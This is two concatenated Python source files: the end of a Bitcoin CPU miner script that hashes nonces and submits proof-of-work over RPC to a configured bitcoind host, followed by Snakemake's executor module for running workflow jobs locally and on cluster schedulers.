self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
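    # Illustrative CONFIG-FILE sketch for the key=value parser below (the
    # values are placeholders; rpcuser/rpcpass must match the local bitcoind
    # RPC credentials):
    #
    #   host = 127.0.0.1
    #   port = 28213
    #   threads = 2
    #   hashmeter = 1
    #   scantime = 30
    #   rpcuser = someuser
    #   rpcpass = somepassword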
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 28213
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
executors.py
|
__author__ = "Johannes Köster"
__copyright__ = "Copyright 2015-2019, Johannes Köster"
__email__ = "koester@jimmy.harvard.edu"
__license__ = "MIT"
import os
import sys
import contextlib
import time
import datetime
import json
import textwrap
import stat
import shutil
import shlex
import threading
import concurrent.futures
import subprocess
import signal
from functools import partial
from itertools import chain
from collections import namedtuple
from tempfile import mkdtemp
from snakemake.io import _IOFile
import random
import base64
import uuid
import re
import math
from snakemake.jobs import Job
from snakemake.shell import shell
from snakemake.logging import logger
from snakemake.stats import Stats
from snakemake.utils import format, Unformattable, makedirs
from snakemake.io import get_wildcard_names, Wildcards
from snakemake.exceptions import print_exception, get_exception_origin
from snakemake.exceptions import format_error, RuleException, log_verbose_traceback
from snakemake.exceptions import (
ProtectedOutputException,
WorkflowError,
ImproperShadowException,
SpawnedJobError,
CacheMissException,
)
from snakemake.common import Mode, __version__, get_container_image, get_uuid
def sleep():
# do not sleep on CI. In that case we just want to quickly test everything.
if os.environ.get("CI") != "true":
time.sleep(10)
class AbstractExecutor:
def __init__(
self,
workflow,
dag,
printreason=False,
quiet=False,
printshellcmds=False,
printthreads=True,
latency_wait=3,
keepincomplete=False,
):
self.workflow = workflow
self.dag = dag
self.quiet = quiet
self.printreason = printreason
self.printshellcmds = printshellcmds
self.printthreads = printthreads
self.latency_wait = latency_wait
self.keepincomplete = keepincomplete
def get_default_remote_provider_args(self):
if self.workflow.default_remote_provider:
return (
" --default-remote-provider {} " "--default-remote-prefix {} "
).format(
self.workflow.default_remote_provider.__module__.split(".")[-1],
self.workflow.default_remote_prefix,
)
return ""
def get_default_resources_args(self):
if self.workflow.default_resources.args is not None:
def fmt(res):
if isinstance(res, str):
res = res.replace('"', r"\"")
return '"{}"'.format(res)
args = " --default-resources {} ".format(
" ".join(map(fmt, self.workflow.default_resources.args))
)
return args
return ""
def run(self, job, callback=None, submit_callback=None, error_callback=None):
self._run(job)
callback(job)
def shutdown(self):
pass
def cancel(self):
pass
def _run(self, job):
job.check_protected_output()
self.printjob(job)
def rule_prefix(self, job):
return "local " if job.is_local else ""
def printjob(self, job):
job.log_info(skip_dynamic=True)
def print_job_error(self, job, msg=None, **kwargs):
job.log_error(msg, **kwargs)
def handle_job_success(self, job):
pass
def handle_job_error(self, job):
pass
class DryrunExecutor(AbstractExecutor):
def printjob(self, job):
super().printjob(job)
if job.is_group():
for j in job.jobs:
self.printcache(j)
else:
self.printcache(job)
def printcache(self, job):
if self.workflow.is_cached_rule(job.rule):
if self.workflow.output_file_cache.exists(job):
logger.info(
"Output file {} will be obtained from global between-workflow cache.".format(
job.output[0]
)
)
else:
logger.info(
"Output file {} will be written to global between-workflow cache.".format(
job.output[0]
)
)
class RealExecutor(AbstractExecutor):
def __init__(
self,
workflow,
dag,
printreason=False,
quiet=False,
printshellcmds=False,
latency_wait=3,
assume_shared_fs=True,
keepincomplete=False,
):
super().__init__(
workflow,
dag,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
latency_wait=latency_wait,
keepincomplete=keepincomplete,
)
self.assume_shared_fs = assume_shared_fs
self.stats = Stats()
self.snakefile = workflow.snakefile
def register_job(self, job):
job.register()
def _run(self, job, callback=None, error_callback=None):
super()._run(job)
self.stats.report_job_start(job)
try:
self.register_job(job)
except IOError as e:
logger.info(
"Failed to set marker file for job started ({}). "
"Snakemake will work, but cannot ensure that output files "
"are complete in case of a kill signal or power loss. "
"Please ensure write permissions for the "
"directory {}".format(e, self.workflow.persistence.path)
)
def handle_job_success(
self,
job,
upload_remote=True,
handle_log=True,
handle_touch=True,
ignore_missing_output=False,
):
if not self.dag.is_edit_notebook_job(job):
job.postprocess(
upload_remote=upload_remote,
handle_log=handle_log,
handle_touch=handle_touch,
ignore_missing_output=ignore_missing_output,
latency_wait=self.latency_wait,
assume_shared_fs=self.assume_shared_fs,
)
self.stats.report_job_end(job)
def handle_job_error(self, job, upload_remote=True):
job.postprocess(
error=True,
assume_shared_fs=self.assume_shared_fs,
latency_wait=self.latency_wait,
)
def format_job_pattern(self, pattern, job=None, **kwargs):
overwrite_workdir = []
if self.workflow.overwrite_workdir:
overwrite_workdir.extend(("--directory", self.workflow.overwrite_workdir))
overwrite_config = []
if self.workflow.overwrite_configfiles:
# add each of the overwriting configfiles in the original order
if self.workflow.overwrite_configfiles:
overwrite_config.append("--configfiles")
overwrite_config.extend(self.workflow.overwrite_configfiles)
if self.workflow.config_args:
overwrite_config.append("--config")
overwrite_config.extend(self.workflow.config_args)
printshellcmds = ""
if self.workflow.printshellcmds:
printshellcmds = "-p"
if not job.is_branched and not job.is_updated:
# Restrict considered rules. This does not work for updated jobs
# because they need to be updated in the spawned process as well.
rules = ["--allowed-rules"]
rules.extend(job.rules)
else:
rules = []
target = kwargs.get("target", job.get_targets())
snakefile = kwargs.get("snakefile", self.snakefile)
cores = kwargs.get("cores", self.cores)
if "target" in kwargs:
del kwargs["target"]
if "snakefile" in kwargs:
del kwargs["snakefile"]
if "cores" in kwargs:
del kwargs["cores"]
return format(
pattern,
job=job,
attempt=job.attempt,
overwrite_workdir=overwrite_workdir,
overwrite_config=overwrite_config,
printshellcmds=printshellcmds,
workflow=self.workflow,
snakefile=snakefile,
cores=cores,
benchmark_repeats=job.benchmark_repeats if not job.is_group() else None,
target=target,
rules=rules,
**kwargs
)
class TouchExecutor(RealExecutor):
def run(self, job, callback=None, submit_callback=None, error_callback=None):
super()._run(job)
try:
# Touching of output files will be done by handle_job_success
time.sleep(0.1)
callback(job)
except OSError as ex:
print_exception(ex, self.workflow.linemaps)
error_callback(job)
def handle_job_success(self, job):
super().handle_job_success(job, ignore_missing_output=True)
_ProcessPoolExceptions = (KeyboardInterrupt,)
try:
from concurrent.futures.process import BrokenProcessPool
_ProcessPoolExceptions = (KeyboardInterrupt, BrokenProcessPool)
except ImportError:
pass
class CPUExecutor(RealExecutor):
def __init__(
self,
workflow,
dag,
workers,
printreason=False,
quiet=False,
printshellcmds=False,
use_threads=False,
latency_wait=3,
cores=1,
keepincomplete=False,
):
super().__init__(
workflow,
dag,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
latency_wait=latency_wait,
keepincomplete=keepincomplete,
)
self.exec_job = "\\\n".join(
(
"cd {workflow.workdir_init} && ",
"{sys.executable} -m snakemake {target} --snakefile {snakefile} ",
"--force -j{cores} --keep-target-files --keep-remote ",
"--attempt {attempt} ",
"--force-use-threads --wrapper-prefix {workflow.wrapper_prefix} ",
"--latency-wait {latency_wait} ",
self.get_default_remote_provider_args(),
self.get_default_resources_args(),
"{overwrite_workdir} {overwrite_config} {printshellcmds} {rules} ",
"--notemp --quiet --no-hooks --nolock --mode {} ".format(
Mode.subprocess
),
)
)
if self.workflow.shadow_prefix:
self.exec_job += " --shadow-prefix {} ".format(self.workflow.shadow_prefix)
if self.workflow.use_conda:
self.exec_job += " --use-conda "
if self.workflow.conda_prefix:
self.exec_job += " --conda-prefix {} ".format(
self.workflow.conda_prefix
)
if self.workflow.use_singularity:
self.exec_job += " --use-singularity "
if self.workflow.singularity_prefix:
self.exec_job += " --singularity-prefix {} ".format(
self.workflow.singularity_prefix
)
if self.workflow.singularity_args:
self.exec_job += ' --singularity-args "{}"'.format(
self.workflow.singularity_args
)
if self.workflow.use_env_modules:
self.exec_job += " --use-envmodules"
self.use_threads = use_threads
self.cores = cores
# Zero thread jobs do not need a thread, but they occupy additional workers.
# Hence we need to reserve additional workers for them.
self.workers = workers + 5
self.pool = concurrent.futures.ThreadPoolExecutor(max_workers=self.workers)
def run(self, job, callback=None, submit_callback=None, error_callback=None):
super()._run(job)
if job.is_group():
# if we still don't have enough workers for this group, create a new pool here
missing_workers = max(len(job) - self.workers, 0)
if missing_workers:
self.workers += missing_workers
self.pool = concurrent.futures.ThreadPoolExecutor(
max_workers=self.workers
)
# the future waits for the entire group job
future = self.pool.submit(self.run_group_job, job)
else:
future = self.run_single_job(job)
future.add_done_callback(partial(self._callback, job, callback, error_callback))
def job_args_and_prepare(self, job):
job.prepare()
conda_env = job.conda_env_path if self.workflow.use_conda else None
container_img = (
job.container_img_path if self.workflow.use_singularity else None
)
env_modules = job.env_modules if self.workflow.use_env_modules else None
benchmark = None
benchmark_repeats = job.benchmark_repeats or 1
if job.benchmark is not None:
benchmark = str(job.benchmark)
return (
job.rule,
job.input._plainstrings(),
job.output._plainstrings(),
job.params,
job.wildcards,
job.threads,
job.resources,
job.log._plainstrings(),
benchmark,
benchmark_repeats,
conda_env,
container_img,
self.workflow.singularity_args,
env_modules,
self.workflow.use_singularity,
self.workflow.linemaps,
self.workflow.debug,
self.workflow.cleanup_scripts,
job.shadow_dir,
job.jobid,
self.workflow.edit_notebook,
)
def run_single_job(self, job):
if self.use_threads or (not job.is_shadow and not job.is_run):
future = self.pool.submit(
self.cached_or_run, job, run_wrapper, *self.job_args_and_prepare(job)
)
else:
# run directive jobs are spawned into subprocesses
future = self.pool.submit(self.cached_or_run, job, self.spawn_job, job)
return future
def run_group_job(self, job):
"""Run a pipe group job.
This lets all items run simultaneously."""
# we only have to consider pipe groups because in local running mode,
# these are the only groups that will occur
futures = [self.run_single_job(j) for j in job]
while True:
k = 0
for f in futures:
if f.done():
ex = f.exception()
if ex is not None:
# kill all shell commands of the other group jobs
# there can be only shell commands because the
# run directive is not allowed for pipe jobs
for j in job:
shell.kill(j.jobid)
raise ex
else:
k += 1
if k == len(futures):
return
time.sleep(1)
def spawn_job(self, job):
exec_job = self.exec_job
cmd = self.format_job_pattern(
exec_job, job=job, _quote_all=True, latency_wait=self.latency_wait
)
try:
subprocess.check_call(cmd, shell=True)
except subprocess.CalledProcessError as e:
raise SpawnedJobError()
def cached_or_run(self, job, run_func, *args):
"""
Either retrieve result from cache, or run job with given function.
"""
to_cache = self.workflow.is_cached_rule(job.rule)
try:
if to_cache:
self.workflow.output_file_cache.fetch(job)
return
except CacheMissException:
pass
run_func(*args)
if to_cache:
self.workflow.output_file_cache.store(job)
def shutdown(self):
self.pool.shutdown()
def cancel(self):
self.pool.shutdown()
def _callback(self, job, callback, error_callback, future):
try:
ex = future.exception()
if ex is not None:
raise ex
callback(job)
except _ProcessPoolExceptions:
self.handle_job_error(job)
# no error callback, just silently ignore the interrupt as the main scheduler is also killed
except SpawnedJobError:
# don't print error message, this is done by the spawned subprocess
error_callback(job)
except (Exception, BaseException) as ex:
self.print_job_error(job)
if not (job.is_group() or job.shellcmd) or self.workflow.verbose:
print_exception(ex, self.workflow.linemaps)
error_callback(job)
def handle_job_success(self, job):
super().handle_job_success(job)
def handle_job_error(self, job):
super().handle_job_error(job)
if not self.keepincomplete:
job.cleanup()
self.workflow.persistence.cleanup(job)
class ClusterExecutor(RealExecutor):
default_jobscript = "jobscript.sh"
def __init__(
self,
workflow,
dag,
cores,
jobname="snakejob.{name}.{jobid}.sh",
printreason=False,
quiet=False,
printshellcmds=False,
latency_wait=3,
cluster_config=None,
local_input=None,
restart_times=None,
exec_job=None,
assume_shared_fs=True,
max_status_checks_per_second=1,
disable_default_remote_provider_args=False,
disable_get_default_resources_args=False,
keepincomplete=False,
):
from ratelimiter import RateLimiter
local_input = local_input or []
super().__init__(
workflow,
dag,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
latency_wait=latency_wait,
assume_shared_fs=assume_shared_fs,
)
if not self.assume_shared_fs:
# use relative path to Snakefile
self.snakefile = os.path.relpath(workflow.snakefile)
jobscript = workflow.jobscript
if jobscript is None:
jobscript = os.path.join(os.path.dirname(__file__), self.default_jobscript)
try:
with open(jobscript) as f:
self.jobscript = f.read()
except IOError as e:
raise WorkflowError(e)
if not "jobid" in get_wildcard_names(jobname):
raise WorkflowError(
'Defined jobname ("{}") has to contain the wildcard {jobid}.'
)
if exec_job is None:
self.exec_job = "\\\n".join(
(
"{envvars} " "cd {workflow.workdir_init} && "
if assume_shared_fs
else "",
"{sys.executable} " if assume_shared_fs else "python ",
"-m snakemake {target} --snakefile {snakefile} ",
"--force -j{cores} --keep-target-files --keep-remote ",
"--wait-for-files {wait_for_files} --latency-wait {latency_wait} ",
" --attempt {attempt} {use_threads} ",
"--wrapper-prefix {workflow.wrapper_prefix} ",
"{overwrite_workdir} {overwrite_config} {printshellcmds} {rules} "
"--nocolor --notemp --no-hooks --nolock ",
"--mode {} ".format(Mode.cluster),
)
)
else:
self.exec_job = exec_job
if self.workflow.shadow_prefix:
self.exec_job += " --shadow-prefix {} ".format(self.workflow.shadow_prefix)
if self.workflow.use_conda:
self.exec_job += " --use-conda "
if self.workflow.conda_prefix:
self.exec_job += " --conda-prefix {} ".format(
self.workflow.conda_prefix
)
if self.workflow.use_singularity:
self.exec_job += " --use-singularity "
if self.workflow.singularity_prefix:
self.exec_job += " --singularity-prefix {} ".format(
self.workflow.singularity_prefix
)
if self.workflow.singularity_args:
self.exec_job += ' --singularity-args "{}"'.format(
self.workflow.singularity_args
)
if self.workflow.use_env_modules:
self.exec_job += " --use-envmodules"
if not disable_default_remote_provider_args:
self.exec_job += self.get_default_remote_provider_args()
if not disable_get_default_resources_args:
self.exec_job += self.get_default_resources_args()
self.jobname = jobname
self._tmpdir = None
self.cores = cores if cores else ""
self.cluster_config = cluster_config if cluster_config else dict()
self.restart_times = restart_times
self.active_jobs = list()
self.lock = threading.Lock()
self.wait = True
self.wait_thread = threading.Thread(target=self._wait_for_jobs)
self.wait_thread.daemon = True
self.wait_thread.start()
self.max_status_checks_per_second = max_status_checks_per_second
self.status_rate_limiter = RateLimiter(
max_calls=self.max_status_checks_per_second, period=1
)
def shutdown(self):
with self.lock:
self.wait = False
self.wait_thread.join()
if not self.workflow.immediate_submit:
# Only delete tmpdir (containing jobscripts) if not using
# immediate_submit. With immediate_submit, jobs can be scheduled
# after this method is completed. Hence we have to keep the
# directory.
shutil.rmtree(self.tmpdir)
def cancel(self):
self.shutdown()
def _run(self, job, callback=None, error_callback=None):
if self.assume_shared_fs:
job.remove_existing_output()
job.download_remote_input()
super()._run(job, callback=callback, error_callback=error_callback)
@property
def tmpdir(self):
if self._tmpdir is None:
self._tmpdir = mkdtemp(dir=".snakemake", prefix="tmp.")
return os.path.abspath(self._tmpdir)
def get_jobscript(self, job):
f = job.format_wildcards(self.jobname, cluster=self.cluster_wildcards(job))
if os.path.sep in f:
raise WorkflowError(
"Path separator ({}) found in job name {}. "
"This is not supported.".format(os.path.sep, f)
)
return os.path.join(self.tmpdir, f)
def format_job(self, pattern, job, **kwargs):
wait_for_files = []
if self.assume_shared_fs:
wait_for_files.append(self.tmpdir)
wait_for_files.extend(job.get_wait_for_files())
format_p = partial(
self.format_job_pattern,
job=job,
properties=job.properties(cluster=self.cluster_params(job)),
latency_wait=self.latency_wait,
wait_for_files=wait_for_files,
**kwargs
)
try:
return format_p(pattern)
except KeyError as e:
raise WorkflowError(
"Error formatting jobscript: {} not found\n"
"Make sure that your custom jobscript is up to date.".format(e)
)
def write_jobscript(self, job, jobscript, **kwargs):
# only force threads if this is not a group job
# otherwise we want proper process handling
use_threads = "--force-use-threads" if not job.is_group() else ""
envvars = " ".join(
"{}={}".format(var, os.environ[var]) for var in self.workflow.envvars
)
exec_job = self.format_job(
self.exec_job,
job,
_quote_all=True,
use_threads=use_threads,
envvars=envvars,
**kwargs
)
content = self.format_job(self.jobscript, job, exec_job=exec_job, **kwargs)
logger.debug("Jobscript:\n{}".format(content))
with open(jobscript, "w") as f:
print(content, file=f)
os.chmod(jobscript, os.stat(jobscript).st_mode | stat.S_IXUSR)
def cluster_params(self, job):
"""Return wildcards object for job from cluster_config."""
cluster = self.cluster_config.get("__default__", dict()).copy()
cluster.update(self.cluster_config.get(job.name, dict()))
# Format values with available parameters from the job.
for key, value in list(cluster.items()):
if isinstance(value, str):
try:
cluster[key] = job.format_wildcards(value)
except NameError as e:
if job.is_group():
msg = (
"Failed to format cluster config for group job. "
"You have to ensure that your default entry "
"does not contain any items that group jobs "
"cannot provide, like {rule}, {wildcards}."
)
else:
msg = (
"Failed to format cluster config "
"entry for job {}.".format(job.rule.name)
)
raise WorkflowError(msg, e)
return cluster
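    # Illustrative cluster_config sketch (typically supplied via
    # --cluster-config as YAML/JSON). The rule name "bwa_map" and the values
    # are placeholders; only the "__default__" merging and per-rule override
    # behavior reflect the code above, and string values may use job wildcards
    # such as {rule}:
    #
    #   __default__:
    #     partition: normal
    #     time: "01:00:00"
    #   bwa_map:
    #     time: "04:00:00"
    #     account: "snakejob.{rule}"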
def cluster_wildcards(self, job):
return Wildcards(fromdict=self.cluster_params(job))
def handle_job_success(self, job):
super().handle_job_success(
job, upload_remote=False, handle_log=False, handle_touch=False
)
def handle_job_error(self, job):
# TODO what about removing empty remote dirs?? This cannot be decided
# on the cluster node.
super().handle_job_error(job, upload_remote=False)
logger.debug("Cleanup job metadata.")
# We have to remove metadata here as well.
# It will be removed by the CPUExecutor in case of a shared FS,
# but we might not see the removal due to filesystem latency.
# By removing it again, we make sure that it is gone on the host FS.
if not self.keepincomplete:
self.workflow.persistence.cleanup(job)
def print_cluster_job_error(self, job_info, jobid):
job = job_info.job
kind = (
"rule {}".format(job.rule.name)
if not job.is_group()
else "group job {}".format(job.groupid)
)
logger.error(
"Error executing {} on cluster (jobid: {}, external: "
"{}, jobscript: {}). For error details see the cluster "
"log and the log files of the involved rule(s).".format(
kind, jobid, job_info.jobid, job_info.jobscript
)
)
GenericClusterJob = namedtuple(
"GenericClusterJob",
"job jobid callback error_callback jobscript jobfinished jobfailed",
)
class GenericClusterExecutor(ClusterExecutor):
def __init__(
self,
workflow,
dag,
cores,
submitcmd="qsub",
statuscmd=None,
cluster_config=None,
jobname="snakejob.{rulename}.{jobid}.sh",
printreason=False,
quiet=False,
printshellcmds=False,
latency_wait=3,
restart_times=0,
assume_shared_fs=True,
max_status_checks_per_second=1,
keepincomplete=False,
):
self.submitcmd = submitcmd
if not assume_shared_fs and statuscmd is None:
raise WorkflowError(
"When no shared filesystem can be assumed, a "
"status command must be given."
)
self.statuscmd = statuscmd
self.external_jobid = dict()
super().__init__(
workflow,
dag,
cores,
jobname=jobname,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
latency_wait=latency_wait,
cluster_config=cluster_config,
restart_times=restart_times,
assume_shared_fs=assume_shared_fs,
max_status_checks_per_second=max_status_checks_per_second,
)
if statuscmd:
self.exec_job += " && exit 0 || exit 1"
elif assume_shared_fs:
# TODO wrap with watch and touch {jobrunning}
# check modification date of {jobrunning} in the wait_for_job method
self.exec_job += " && touch {jobfinished} || (touch {jobfailed}; exit 1)"
else:
raise WorkflowError(
"If no shared filesystem is used, you have to "
"specify a cluster status command."
)
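    # Illustrative invocation sketch (the wrapper script name is hypothetical;
    # --cluster and --cluster-status are the Snakemake CLI options that feed
    # submitcmd/statuscmd above):
    #
    #   snakemake --cluster "sbatch --parsable" --cluster-status ./status.sh
    #
    # where ./status.sh prints exactly one of "success", "failed" or "running"
    # for the external job id passed to it, as expected by _wait_for_jobs() below.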
def cancel(self):
logger.info("Will exit after finishing currently running jobs.")
self.shutdown()
def register_job(self, job):
# Do not register job here.
# Instead do it manually once the jobid is known.
pass
def run(self, job, callback=None, submit_callback=None, error_callback=None):
super()._run(job)
workdir = os.getcwd()
jobid = job.jobid
jobscript = self.get_jobscript(job)
jobfinished = os.path.join(self.tmpdir, "{}.jobfinished".format(jobid))
jobfailed = os.path.join(self.tmpdir, "{}.jobfailed".format(jobid))
self.write_jobscript(
job, jobscript, jobfinished=jobfinished, jobfailed=jobfailed
)
if self.statuscmd:
ext_jobid = self.dag.incomplete_external_jobid(job)
if ext_jobid:
# Job is incomplete and still running.
# We simply register it and wait for completion or failure.
logger.info(
"Resuming incomplete job {} with external jobid '{}'.".format(
jobid, ext_jobid
)
)
submit_callback(job)
with self.lock:
self.active_jobs.append(
GenericClusterJob(
job,
ext_jobid,
callback,
error_callback,
jobscript,
jobfinished,
jobfailed,
)
)
return
deps = " ".join(
self.external_jobid[f] for f in job.input if f in self.external_jobid
)
try:
submitcmd = job.format_wildcards(
self.submitcmd, dependencies=deps, cluster=self.cluster_wildcards(job)
)
except AttributeError as e:
raise WorkflowError(str(e), rule=job.rule if not job.is_group() else None)
try:
ext_jobid = (
subprocess.check_output(
'{submitcmd} "{jobscript}"'.format(
submitcmd=submitcmd, jobscript=jobscript
),
shell=True,
)
.decode()
.split("\n")
)
except subprocess.CalledProcessError as ex:
logger.error(
"Error submitting jobscript (exit code {}):\n{}".format(
ex.returncode, ex.output.decode()
)
)
error_callback(job)
return
if ext_jobid and ext_jobid[0]:
ext_jobid = ext_jobid[0]
self.external_jobid.update((f, ext_jobid) for f in job.output)
logger.info(
"Submitted {} {} with external jobid '{}'.".format(
"group job" if job.is_group() else "job", jobid, ext_jobid
)
)
self.workflow.persistence.started(job, external_jobid=ext_jobid)
submit_callback(job)
with self.lock:
self.active_jobs.append(
GenericClusterJob(
job,
ext_jobid,
callback,
error_callback,
jobscript,
jobfinished,
jobfailed,
)
)
def _wait_for_jobs(self):
success = "success"
failed = "failed"
running = "running"
if self.statuscmd is not None:
def job_status(job):
try:
# this command shall return "success", "failed" or "running"
return (
subprocess.check_output(
"{statuscmd} {jobid}".format(
jobid=job.jobid, statuscmd=self.statuscmd
),
shell=True,
)
.decode()
.split("\n")[0]
)
except subprocess.CalledProcessError as e:
if e.returncode < 0:
# Ignore SIGINT and all other issues due to signals
# because it will be caused by hitting e.g.
# Ctrl-C on the main process or sending killall to
# snakemake.
# Snakemake will handle the signal in
# the master process.
pass
else:
raise WorkflowError(
"Failed to obtain job status. "
"See above for error message."
)
else:
def job_status(job):
if os.path.exists(active_job.jobfinished):
os.remove(active_job.jobfinished)
os.remove(active_job.jobscript)
return success
if os.path.exists(active_job.jobfailed):
os.remove(active_job.jobfailed)
os.remove(active_job.jobscript)
return failed
return running
while True:
with self.lock:
if not self.wait:
return
active_jobs = self.active_jobs
self.active_jobs = list()
still_running = list()
logger.debug("Checking status of {} jobs.".format(len(active_jobs)))
for active_job in active_jobs:
with self.status_rate_limiter:
status = job_status(active_job)
if status == success:
active_job.callback(active_job.job)
elif status == failed:
self.print_job_error(
active_job.job,
cluster_jobid=active_job.jobid
if active_job.jobid
else "unknown",
)
self.print_cluster_job_error(
active_job, self.dag.jobid(active_job.job)
)
active_job.error_callback(active_job.job)
else:
still_running.append(active_job)
with self.lock:
self.active_jobs.extend(still_running)
sleep()
SynchronousClusterJob = namedtuple(
"SynchronousClusterJob", "job jobid callback error_callback jobscript process"
)
class SynchronousClusterExecutor(ClusterExecutor):
"""
invocations like "qsub -sync y" (SGE) or "bsub -K" (LSF) are
synchronous, blocking the foreground thread and returning the
remote exit code at remote exit.
"""
def __init__(
self,
workflow,
dag,
cores,
submitcmd="qsub",
cluster_config=None,
jobname="snakejob.{rulename}.{jobid}.sh",
printreason=False,
quiet=False,
printshellcmds=False,
latency_wait=3,
restart_times=0,
assume_shared_fs=True,
keepincomplete=False,
):
super().__init__(
workflow,
dag,
cores,
jobname=jobname,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
latency_wait=latency_wait,
cluster_config=cluster_config,
restart_times=restart_times,
assume_shared_fs=assume_shared_fs,
max_status_checks_per_second=10,
)
self.submitcmd = submitcmd
self.external_jobid = dict()
def cancel(self):
logger.info("Will exit after finishing currently running jobs.")
self.shutdown()
def run(self, job, callback=None, submit_callback=None, error_callback=None):
super()._run(job)
workdir = os.getcwd()
jobid = job.jobid
jobscript = self.get_jobscript(job)
self.write_jobscript(job, jobscript)
deps = " ".join(
self.external_jobid[f] for f in job.input if f in self.external_jobid
)
try:
submitcmd = job.format_wildcards(
self.submitcmd, dependencies=deps, cluster=self.cluster_wildcards(job)
)
except AttributeError as e:
raise WorkflowError(str(e), rule=job.rule if not job.is_group() else None)
process = subprocess.Popen(
'{submitcmd} "{jobscript}"'.format(
submitcmd=submitcmd, jobscript=jobscript
),
shell=True,
)
submit_callback(job)
with self.lock:
self.active_jobs.append(
SynchronousClusterJob(
job, process.pid, callback, error_callback, jobscript, process
)
)
def _wait_for_jobs(self):
while True:
with self.lock:
if not self.wait:
return
active_jobs = self.active_jobs
self.active_jobs = list()
still_running = list()
for active_job in active_jobs:
with self.status_rate_limiter:
exitcode = active_job.process.poll()
if exitcode is None:
# job not yet finished
still_running.append(active_job)
elif exitcode == 0:
# job finished successfully
os.remove(active_job.jobscript)
active_job.callback(active_job.job)
else:
# job failed
os.remove(active_job.jobscript)
self.print_job_error(active_job.job)
self.print_cluster_job_error(
active_job, self.dag.jobid(active_job.job)
)
active_job.error_callback(active_job.job)
with self.lock:
self.active_jobs.extend(still_running)
sleep()
DRMAAClusterJob = namedtuple(
"DRMAAClusterJob", "job jobid callback error_callback jobscript"
)
class DRMAAExecutor(ClusterExecutor):
def __init__(
self,
workflow,
dag,
cores,
jobname="snakejob.{rulename}.{jobid}.sh",
printreason=False,
quiet=False,
printshellcmds=False,
drmaa_args="",
drmaa_log_dir=None,
latency_wait=3,
cluster_config=None,
restart_times=0,
assume_shared_fs=True,
max_status_checks_per_second=1,
keepincomplete=False,
):
super().__init__(
workflow,
dag,
cores,
jobname=jobname,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
latency_wait=latency_wait,
cluster_config=cluster_config,
restart_times=restart_times,
assume_shared_fs=assume_shared_fs,
max_status_checks_per_second=max_status_checks_per_second,
)
try:
import drmaa
except ImportError:
raise WorkflowError(
"Python support for DRMAA is not installed. "
"Please install it, e.g. with easy_install3 --user drmaa"
)
except RuntimeError as e:
raise WorkflowError("Error loading drmaa support:\n{}".format(e))
self.session = drmaa.Session()
self.drmaa_args = drmaa_args
self.drmaa_log_dir = drmaa_log_dir
self.session.initialize()
self.submitted = list()
def cancel(self):
